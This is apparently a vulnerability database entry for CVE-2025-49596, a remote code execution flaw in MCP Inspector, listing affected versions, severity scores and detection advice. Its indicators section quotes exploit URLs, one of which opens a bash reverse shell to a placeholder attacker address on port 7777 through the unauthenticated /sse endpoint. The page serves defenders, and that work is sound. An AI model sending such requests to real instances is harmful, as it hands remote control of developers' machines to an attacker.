cbcvebase.
CVE-2025-49596
published 2025-06-13

CVE-2025-49596: The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due…

PriorityP188critical9.4CVSS 4.0
AVNACLATNPRNUIPVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
37.03%
98.3th percentile
The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.

Affected

3 ranges
VendorProductVersion rangeFixed in
mcpjaminspector>= 0 < 1.4.31.4.3
modelcontextprotocolinspector< 0.14.10.14.1
modelcontextprotocolinspector>= 0 < 0.14.10.14.1

Detection & IOCsextracted from sources · hover to see the quote

port6277
port6274
urlhttp://127.0.0.1:6277/sse?transportType=stdio&command=bash&args=-c%20%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FATTACKER_IP%2F7777%200%3E%261%27%22&env=
urlhxxp://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser
path/sse
othermcp-session-id
port7777
  • Monitor for HTTP GET requests to the /sse endpoint on ports 6277 or 0.0.0.0:6277 containing query parameters transportType=stdio and command= — this is the canonical exploit path for CVE-2025-49596.
  • In patched versions (0.14.1+), the proxy responds with HTTP 401 and the body 'Authentication required. Use the session token shown in the console when starting the server' — absence of this response on port 6277 indicates a vulnerable instance.
  • Alert on process spawning from the MCP proxy process (node/npx) where child processes include shells (bash, sh) or network utilities (nc, curl) — the proxy spawns new processes based on the command sent by the client.
  • Use Shodan or internal asset discovery to identify exposed MCP Inspector proxy instances listening on port 6277 — at time of writing 560 instances were publicly exposed.
  • DNS rebinding detection: watch for rapid DNS TTL changes where a domain resolves first to a public IP and then to 127.0.0.1 or 0.0.0.0, which can be used to bypass same-origin policy and reach the unauthenticated MCP Inspector API.
  • ·The MCP proxy binds to all network interfaces by default (not just localhost) in vulnerable versions, making it reachable by any attacker on the same network or internet — not just localhost-based CSRF attacks.
  • ·CVE-2025-49596 affects all software that embeds or depends on MCP Inspector versions prior to 0.14.1, not just standalone installations.

CVSS provenance

nvdv4.09.4CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ghsa9.4CRITICAL
osv9.4CRITICAL
vulncheck9.4CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.